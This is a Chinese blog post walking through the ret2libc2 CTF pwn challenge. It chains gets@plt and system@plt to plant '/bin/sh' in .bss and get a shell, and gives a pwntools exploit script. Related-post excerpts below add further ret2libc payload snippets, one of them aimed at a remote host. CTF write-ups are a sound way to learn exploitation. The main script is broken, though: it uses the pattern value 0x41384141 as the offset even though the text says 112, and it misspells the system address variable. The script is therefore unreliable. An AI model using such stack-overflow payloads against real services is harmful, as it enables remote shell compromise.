【PWN · ret2libc】ret2libc2

最新推荐文章于 2024-06-30 20:54:26 发布
最新推荐文章于 2024-06-30 20:54:26 发布
阅读量1.1k 收藏 4
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 【PWN · Stack】 文章标签: pwn ret2libc ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mr_Fmnwon/article/details/130568183
文章介绍了在存在system@plt但无/bin/sh字符串的情况下,如何利用ret2libc漏洞构造exploit,通过输入自定义字符串并利用gets@plt获取控制权,最终执行shell。通过填充栈帧,跳转执行gets然后system,并使用ida反汇编分析找到合适地址存储字符串。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ret2libc1的略微进阶——存在system@plt但是不存在“/bin/sh”怎么办?

目录

前言

python3 ELF 查看文件信息

strings 查看寻找"/bin/sh"

IDA反汇编分析 

思路及实现 

老规矩,偏移量 offset

EXP编写  

总结

前言

经过ret2libc1的洗礼,我们对ret2libc的做题模范有了基本的范式,然而实际的题目远没有如此直白和简单。本题就遇到了一个问题:"/bin/sh"字符串在程序中并不存在,怎么办?

其实很简单:没有我们就自己输入。

因为具体的原理在ret2libc1中已经很详细地讲述了,所以本篇博客主要复现解题过程。

python3 ELF 查看文件信息

好的,重要的信息都有了 

strings 查看寻找"/bin/sh"

说明没有这个字符串,恼 

那我们能不能输入一串字符串"/bin/sh",然后把参数地址放到这里呢?

IDA反汇编分析 

bss段发现buf2,可供我们存字符串。可是也没有输入的函数呀?没关系——shellcode里面加就可以。

别忘了,plt表里面有gets@plt!我们既然可以用一种方法,通过system@plt执行system函数,为什么不可以用gets@plt执行gets函数呢?当然可以!! 

思路及实现 

根据基本ret2libc的思想,我们把溢出栈内容如下构造:

这是需要跳转执行两个函数的情况,基于跳转执行一个函数的情况而来,具体可以看上一篇博客ret2libc1 

简单来说,padding后,函数通过返回地址跳到gets@plt然后经过一系列代码,执行gets函数,gets函数的参数从栈gets_addr的后两个单位找到。这个原理很基础,不赘述。具体看上一篇博客。然后同理跳到system@plt执行system,参数向上找第二个(跨过两个单位,其中一个是callee 的push ebp), 也是buf2_addr。

这样就实现了:没有"/bin/sh",输入就有了;照旧system,参数填"/bin/sh"地址;返回shell

老规矩,偏移量 offset

gdb:peda下,pattern create 300 

然后pattern offset addr 

 

 偏移量112

EXP编写  

from pwn import *

io=process("./ret2libc2")

offset=0x41384141
system_plt_Addr=0x8048490
gets_plt_addr=0x8048460
buf2_addr=0x804a080

payload=b'a'*offset+p32(gets_plt_addr)+p32(system_plt_addr)+p32(buf2_addr)+p32(buf2_addr)

io.sendline(payload)
io.sendline('/bin/sh')
io.interactive()

成功获得自己的shell 

总结

从最基本理解原理的ret2libc1,到有点花头的ret2libc2,值得展望的是,比赛的题目,远远难于此。但千里之行始于足下,掌握好这些基础的,掌握好这些原理,才能慢慢深入进阶。

[NewStarCTF 公开赛赛道]ret2libc(BUUCTF
Welcome To Myon'Blog !
05-20 829
本文描述了一个64程序的栈溢出漏洞利用过程。程序开启了NX保护,且没有直接提供/bin/sh字符串和system函数。通过分析,作者采用了ret2libc攻击思路,利用puts函数泄露其真实地址,进而计算libc基址,获取system函数和/bin/sh字符串的地址。首先,通过构造第一个payload,利用pop_rdi和ret指令将puts函数的真实地址泄露出来,并返回到main函数。接着,构造第二个payload,将/bin/sh字符串地址传入rdi寄存器,调用system函数,最终成功获取shell
[CTF]PWN--新人入门第一关--Ret2libc
2301_79880752的博客
02-29 1656
首先我们需要找到pop rdi|ret这个指令在程序中的置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
ret2libc pwn
qq_41560595的博客
09-27 977
查看栈保护 F5查看源代码 看见gets函数,立刻想到是栈溢出题型,但是此题并未提供system("/bin/sh")函数。而程序运行的时候会调用libc.so,它包含了system()等函数,因此可以根据这个特性构造system("/bin/sh")。 判断覆盖量 查找system()的地址 objdump -d -j .plt ./ret 查找/bin/sh的地址 编写脚本 from pwn import * p=process('./ret') system_addr=0x08048460
PWN —— ret2libc2
qq_41696518的博客
07-03 358
ret2libc2
pwn入门系列-ret2libc2
小心信科理化声
12-10 3241
Ret2libc2 今天来做一下经典的retlibc系列的第二题 资源:ret2libc2 老样子先checksec [*] '/home/giantbranch/Desktop/pwn/ret2libc2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 可以看到
pwn学习——ret2libc2
MrTreebook的博客
11-28 1267
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
pwn基本ROP——ret2libc
turtlesd的博客
04-26 3127
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
pwn ret2libc
清霂的博客
02-04 602
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libc。 libc.so是一个函数库(类似于C语言#include<iostream>的iostrea
pwn学习-ret2libc1
Sa1nZen的博客
06-02 381
pwn学习-ret2libc1
pwn学习-ret2libc3
Sa1nZen的博客
06-30 677
pwn学习-ret2libc3
字符串溢出(pwn溢出)--ret2libc
莫慌的博客
09-29 568
pwn入门
PWN —— ret2libc1
qq_41696518的博客
07-03 520
ret2libc1
Ret2Libc(1) (有system、/bin/sh)绕过NX、ASLR
X丶 的博客
11-21 1224
Ret2Libc即控制程序执行libc库中的函数。 通常是返回到某个函数的plt处,或者函数运行时候的实际地址。 下面是一个例子: 可以看出程序gets有一个明显的溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO...
plt_System_Security_Cryptography_HMAC_KeySetup_byte___byte
weixin_30372371的博客
04-11 93
今天突然发现原来的HMAC加密出问题了,在IOS上怎么都用不了。。 最后才发现我在unity3d中的选项选择了去掉安全库了。。 Stripping Level,选择Use micro mscorliblevel就会去掉安全库了。 详情见: http://docs.unity3d.com/Documentation/Manual/iphone-playerSizeOptimiz...
pwn学习】pwn中直接调用system和调用call system的区别
Morphy_Amo的博客
12-06 3026
以 XCTF-pwn-新手区-004 为例, 本题在构造payload的时候有两种方式构造 第一种,溢出后的返回地址是system的地址,也就是plt表中system的地址 system_addr = 0x08048320 binsh_addr = 0x0804a024 payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(0) + p32(binsh_addr) 第二种,溢出后的返回地址是call system的地址,这是程序中出现过的调用syste
Linux pwn入门教程(6)——格式化字符串漏洞
xiaoi123的博客
08-03 2407
作者:Tangerine@SAINTSEC 0x00 printf函数中的漏洞 printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 char s[20] = “Hello world!\n”; printf(“%s”, s); 然而,有时候为了省事也会写成 char s[20] = “Hello wor...
攻防世界 Pwn level2
MrTreebook的博客
07-16 619
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
linux 格式化字符串漏洞
sky123博客
02-04 2396
格式化字符串漏洞 格式化字符串介绍 常见格式化字符串函数 函数 基本介绍 printf 输出到stdout fprintf 输出到指定FILE流 vprintf 根据参数列表格式化输出到stdout vfprintf 根据参数列表格式化输出到FILE流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列表格式化输出到字符串 vsnprintf 根据参数列表格式化输出指定字节到字符串 常用格式化字符串形式 %[p
ctf wiki pwn ret2libc
最新发布
03-01
### CTF PWN Ret2libc 攻击教程与实例 Ret2libc是一种利用栈溢出漏洞的技术,在这种技术下,攻击者通过覆盖返回地址来调用系统中的现有函数(通常是`system()`),从而执行任意命令。当面对静态链接的二进制文件时,由于其缺少GOT/PLT表,“xxx is statically linked, skipping GOT/PLT symbols”的提示表明无法从这些地方获取库函数地址[^1]。 对于动态链接的目标而言,可以通过操纵堆栈指针指向目标函数的实际置实现ret2libc攻击;而对于静态编译的情况,则可以直接在`.text`段内寻找所需的函数入口点并加以利用。 下面是一个简单的Python脚本用于演示如何实施ret2libc攻击: ```python from pwn import * # 设置远程连接参数 host = 'example.com' port = 9999 # 连接到服务端 conn = remote(host, port) # 假设已知偏移量为offset=108字节,并且存在可以控制的数据于该处之后 offset = 108 # 获取/bin/sh字符串的置以及system()函数的真实地址 bin_sh_addr = 0xdeadbeef # 需要替换为实际地址 system_addr = 0xbadc0de # 同上 payload = b'A' * offset + pack(system_addr) + b'JUNK' + pack(bin_sh_addr) # 发送载荷给服务器 conn.sendline(payload) # 切换到交互模式以便观察后续操作结果 conn.interactive() ``` 此代码片段展示了发送精心构造的有效负载至易受攻击的服务的过程,其中包含了必要的填充字符、system()函数地址及其参数"/bin/sh"所在内存区域的指针值。需要注意的是上述示例中使用的具体数值应当依据实际情况调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值